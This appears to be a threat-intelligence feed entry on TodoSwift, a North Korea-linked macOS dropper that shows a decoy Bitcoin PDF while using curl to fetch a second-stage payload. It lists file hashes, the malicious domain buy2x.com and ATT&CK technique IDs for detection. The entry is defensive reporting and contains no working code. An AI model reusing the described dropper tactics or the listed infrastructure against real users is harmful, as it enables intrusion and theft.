TodoSwift Disguises Malware Download Behind Bitcoin PDF
Aug. 19, 2024, 1:59 p.m.
Tags
External References
Description
This report details a macOS threat actor likely originating from North Korea that employs a dropper application written in Swift/SwiftUI. The dropper presents the user with a seemingly legitimate Bitcoin pricing PDF while simultaneously downloading and executing a malicious payload. The malware's tactics, such as using Google Drive URLs and passing command-and-control URLs as launch arguments, align with previous campaigns attributed to the DPRK-linked BlueNoroff group. The binary leverages NSTask objects to launch curl commands, download files, and ultimately deploy a second-stage payload.
Date
Published: Aug. 19, 2024, 1:35 p.m.
Created: Aug. 19, 2024, 1:35 p.m.
Modified: Aug. 19, 2024, 1:59 p.m.
Indicators
f1b3ce96462027644f9caa314d3da745dab139ee1cb14fe508234e76bd686f93
e09d2277a19dddd751edb164bde064682a6acc41a7ee178a2dacd4f9ac357fc7
c52e3e73d7870bf8edc1b9ae52b26c08ef2466f948ef3446b2c865fd53d859dd
a55029c963ff454e42483b9b6f0293dc546e06b2fb71e6ebaa4c6f146a9906a3
9b839e9169babff1d14468d9f8497c165931dc65d5ff1f4b547925ff924c43fe
9623c98f7338d56b07b35cd379e31e685e32a9c5317d7bc4af5276916cef4ed3
buy2x.com
Attack Patterns
TodoSwift
KandyKorn
RustBucket
BlueNoroff
T1024
T1574
T1547
T1106
T1105
T1543
T1036
T1027
T1059